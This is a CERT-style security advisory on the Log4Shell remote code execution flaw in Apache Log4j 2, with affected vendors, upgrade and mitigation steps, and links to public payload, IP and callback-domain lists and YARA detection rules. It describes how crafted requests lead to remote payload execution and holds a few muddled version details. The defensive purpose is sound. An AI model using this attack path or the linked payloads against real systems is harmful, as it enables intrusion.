Issued: Sunday, 12 December, 2021 |
Last Revision: Wednesday, 15 December, 2021 |
Vendor: |
Product: |
Severity Level: |
December 15, 2021
The Summary section was updated to include more confirmed impacted products and remove non-vulnerable products.
The Recommendation section was modified to recommend updating to log4j 2.16.0 as a related vulnerability was discovered in 2.15.0.
The content of the Mitigation sub-section was modified, and two more related vulnerabilities’ mitigations were added.
The content of the Detection of Exploitation Attempts subsection was modified to include YARA rules.
The References section was modified.
There has been an identified remote code execution vulnerability (CVE-2021-44228) in Apache log4j 2. A proof-of-concept (PoC) version of the exploit code has been released publicly, and as per security researcher it is extremely easy to exploit.
Based on how the system is configured, a malicious payload can be downloaded and executed by an attacker submitting a specially crafted request to a vulnerable system.
CVE/Vulnerability | Description | CVSS3.0 Score |
CVE-2021-44228 | Remote Code Execution Vulnerability | 10 |
Table 1: Vulnerability details
CVE/Vulnerability | Affected Product(s) |
CVE-2021-44228 | Apache Log4j 2.x <= 2.15.0-rc1 |
Table 2: Vulnerable versions
The Summary section was updated to include more confirmed impacted products:
- Apache Struts - https://struts.apache.org/announce-2021#a20211212-2
- Apache Solr - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- Apache Druid - https://github.com/apache/druid/pull/12051
- Apache Dubbo - https://github.com/apache/dubbo/issues/9380
- Apache Flink - https://issues.apache.org/jira/browse/FLINK-25240
- Other Apache Projects - https://blogs.apache.org/security/entry/cve-2021-44228
- Cisco: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- ElasticSearch
- Flume
- Fortinet: https://www.fortiguard.com/psirt/FG-IR-21-245
- IBM: https://www.ibm.com/blogs/psirt/category/severity-critical/
- Logstash
- ManageEngine: https://pitstop.manageengine.com/portal/en/community/topic/update-on-the-recent-apache-log4j2-vulnerability-impact-on-manageengine-on-premises-products-1
- Oracle: https://login.oracle.com/mysso/signon.jsp
- SAP: https://accounts.sap.com/saml2/idp/sso
- Siemens: https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
- SonicWall: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- Spring-Boot-starter-log4j2
- Ubuntu: https://ubuntu.com/security/CVE-2021-44228
- Veritas: https://www.veritas.com/content/support/en_US/article.100052058
- VMware: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Other vendors are investigating if their products are vulnerable to Apache Log4j Remote Code Execution Vulnerability.
We encourage organizations to keep checking if any of their used technology’s' vendors advisories for any updates regarding this vulnerability and follow their recommendations. The National Cyber Security Centrum (NCSC-NL) is consolidating a list of products and their impact status, however, please confirm by visiting the vendor’s website.
Apache has released version 2.16.0 to address CVE-2021- 44228 and CVE-2021-45046. We encourage entities to apply patch immediately. Please refer link below to download the latest version of the software.
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.16.0-rc1
Mitigation
Mitigation | |
Log4j 1.2 (Mitigates CVE-2021-4104) | If configured, JMSAppender in Log4j 1.2 is vulnerable and can perform JNDI lookup requests. Log4j 1.x reached EOL and affected by old vulnerabilities. |
2.0-beta9 < Version < 2.16.0 (Does mitigate new CVE-2021-45046)
| Remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Remove the JndiManager class from the log4j-core jar. Removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function. |
2.10 <= Version <= 2.15.0 (Does not mitigate new CVE-2021-45046) | Set system property “log4j2.formatMsgNoLookups” to “true” |
add -Dlog4j2.formatMsgNoLookups=true as a JVM command line option in the startup script, or add log4j2.formatMsgNoLookups=true to the log4j2.component.properties file on the classpath to prevent lookups in log event messages. | |
set the environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to ”true” | |
Version >= 2.7 | specify %m{nolookups} in the PatternLayout configuration instead of %m to prevent lookups in log event messages. |
Java version < 8u121, 7u201, 6u211, 11.01 | Not sufficient to mitigate this vulnerability, even upgrading to newer versions. (https://www.veracode.com/blog/research/exploiting-jndi-injections-java) To disable remote class loading, set the properties "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to false. |
- Setup the firewall to deny suspicious outbound traffic from your vulnerable application.
- Use egress filtering to stop outbound traffic.
Detection of exploitation attempts:
- We strongly recommend to adopt an assume breach mentality and review your logs for any indications of compromise (IOCSs).
Below are some samples of publicly shared IOCs.
- Payloads - https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890#file-greynoise_payloads-md
- IP addresses - https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
- IP addresses - https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
- Callback domains - https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
- Review logs under /var/log and it's subfolders (compressed and uncompressed) for indicators of JNDI lookup. For examples of payloads refer to the previous point.
- Log4Shell exploitation attempts detector tool by Florian Roth:
- https://github.com/Neo23x0/log4shell-detector
- Log4Shell Yara rules
- https://bishopfox.com/blog/log4j-zero-day-cve-2021-44228
- https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar